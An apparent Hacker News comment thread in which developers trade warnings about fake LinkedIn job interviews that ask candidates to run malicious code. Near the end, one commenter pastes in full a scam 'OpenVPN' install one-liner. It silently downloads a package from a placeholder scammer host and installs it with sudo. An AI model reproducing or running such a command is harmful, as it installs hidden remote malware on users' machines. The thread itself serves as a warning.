I once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
Weird, isn't it? Microsoft owns all of LinkedIn, Github and NPM.
All three either have security or stability issues, which seems to get worse, not better, as microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
They should have reported it for DMCA violation. It would be gone instantly.
They seem to using the same domain for multiple targets: reddit thread from 3 months ago:
https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
Why is npm still not blocked by every OS on earth is beyond me. These guys will never learn.
Nothing to do with nom itself. This sort of scam would have worked with many different technologies, even a Makefile.
> So far nothing has changed and the code is still up.
That sucks, but it seems to be par for the course, these days.
Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
>Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
It's ok, the guy with glasses from the Daily Show said it's ok.
Or running random curl | bash scripts from GitHub, AUR, NPM are just as bad but many developers here still have dubious assumptions on this bad practice.
The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
> Maybe Mac will finally get decent virtualization framework.
it already has, you can configure intellij to run npm commands in a Docker container.
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
My brother had been unemployed for a long time due to illness, and finally got a "job offer" on LinkedIn that seemed legit to him. They asked for him to write a check to make a deposit for his company laptop (which seems pretty insane on the face of it), but he was desperate and really happy to finally have a job offer.
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
Hoisted by their own petard vibes.
This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
I was a victim of this attack on Friday. The interviewer had a russian / east European accent.
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
You can actually test it yourself. The actual URL is in the post and the website is still up.
This has happened to me, it was an attack that was trying to get crypto private keys (ethereum)
Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.
Yes, throwaway VPS for interview coding tasks should be the new norm.
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
Oh my goodness! I had this playout as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
Seen similar: https://www.theregister.com/security/2026/04/23/dev-targeted...
> but on a more tired or rushed day
This has nearly gotten me before, and I got lucky.
I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
LinkedIn is a cesspool of scams now.
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
Something similar happened to a friend, repo https://github.com/momonity/cryptoskope/
I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.
The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
Would highly recommend running any repo in an isolated environment like a vm
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.
Stay vigilant out there everyone.
> Such people are the worst of the worst of humanity.
I don't know. There's a plentiful supply of bad humans.
Anyone who preys on people who are desperate and hurting are certainly some of the worst though.
Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
It would have been game over for me.
I'm working 3 remote jobs right now and I can tell you guys to really watch out.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:
- Don't stay loyal to your employers.
- Don't stay honest to those don't value it.
- Don't stay complacent always innovate.
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
the entire internet is just phishing at this point
More reasons for me to dislike linked-in. I have an account. I hate it.
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):
```
( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]
```
Yeah, no. Be careful out there.
By the way, here's the scammer's "company website": https://jtwllc.com/
Superficially looks legit until you start investigating the finer details.
Yet another reason to be reluctant to even discuss linkedin job offers
now imagine if you were like the rest of us and didn’t write a blog post about it
I would not have found out about this. Thanks for the writer for taking the time.
Been going on for over half a decade
I think we need a different kind of PSA if its still so new to people